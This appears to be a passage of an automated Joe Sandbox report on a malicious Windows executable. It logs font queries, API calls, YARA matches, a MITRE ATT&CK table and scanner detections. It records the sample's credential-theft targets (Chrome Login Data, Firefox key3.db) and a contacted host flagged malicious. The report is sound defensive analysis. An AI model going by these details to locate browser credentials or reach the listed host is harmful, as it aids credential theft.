                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\taile.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\pala.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\palai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\palab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00404F51 GetLocalTime,CreateEventA,CreateThread
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041B69E GetComputerNameExW,GetUserNameW
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 3_2_0040BA4D
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 3_2_0040BB6B
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: \key3.db | 3_2_0040BB6B

Remote Access Functionality

Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-35QZU7
Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: cmd.exe | 3_2_0040569A
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 Windows Service | 1 Bypass User Account Control | 1 Deobfuscate/Decode Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 111 Input Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | Logon Script (Windows) | 1 Access Token Manipulation | 3 Obfuscated Files or Information | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Windows Service | 12 Software Packing | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 22 Process Injection | 1 DLL Side-Loading | LSA Secrets | 33 System Information Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Bypass User Account Control | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 22 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement


Source | Detection | Scanner | Label | Link
6Ctc0o7vhqKgjU7.exe | 34% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
6Ctc0o7vhqKgjU7.exe | 100% | Avira | HEUR/AGEN.1306904 |
6Ctc0o7vhqKgjU7.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.carterandcone.coml | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sajatypeworks.com | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/frere-user.html | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gppW# | 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4150350434.00000000011D2000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp/C | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                                high
                                                                http://www.fontbureau.com/designers86Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.fonts.com6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.sandoll.co.kr6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.urwpp.deDPlease6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.zhongyicts.com.cn6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.sakkal.com6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719025391.0000000005960000.00000004.00000020.00020000.00000000.sdmp, 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1719052184.0000000006A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
192.3.64.152 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549119
Start date and time: 2024-11-05 10:59:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 6Ctc0o7vhqKgjU7.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@5/3@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 58
• Number of non-executed functions: 195
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 6Ctc0o7vhqKgjU7.exe
Time | Type | Description
05:00:04 | API Interceptor | 4224716x Sleep call for process: 6Ctc0o7vhqKgjU7.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
